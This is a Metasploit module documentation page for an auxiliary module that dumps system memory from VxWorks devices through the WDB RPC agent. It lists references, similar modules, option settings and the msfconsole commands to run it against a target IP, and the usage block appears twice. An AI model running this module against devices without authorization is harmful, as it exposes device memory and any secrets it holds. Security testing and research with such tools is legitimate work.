Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
VxWorks WDB Agent Remote Memory Dump
This module provides the ability to dump the system memory of a VxWorks target through WDBRPC
Rank
- Normal
Authors
- hdm < hdm [at] metasploit.com >
References
- OSVDB-66842
- http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html
- http://www.kb.cert.org/vuls/id/362332
Development
Similar Modules
- auxiliary/admin/vxworks/apple_airport_extreme_password
- auxiliary/admin/vxworks/dlink_i2eye_autoanswer
- auxiliary/admin/vxworks/wdbrpc_reboot
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/vxworks/wdbrpc_memory_dump
msf auxiliary(wdbrpc_memory_dump) > set RHOST [TARGET IP]
msf auxiliary(wdbrpc_memory_dump) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/vxworks/wdbrpc_memory_dump
msf auxiliary(wdbrpc_memory_dump) > set RHOST [TARGET IP]
msf auxiliary(wdbrpc_memory_dump) > run
Module Options
| LPATH | The local filename to store the dumped memory (default: /home/svn/.msf4/logs/vxworks_memory.dmp) |
| OFFSET | The starting offset to read the memory dump (hex allowed) (default: 0) |
| RHOST | The target address |
| RPORT | The target port (default: 17185) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |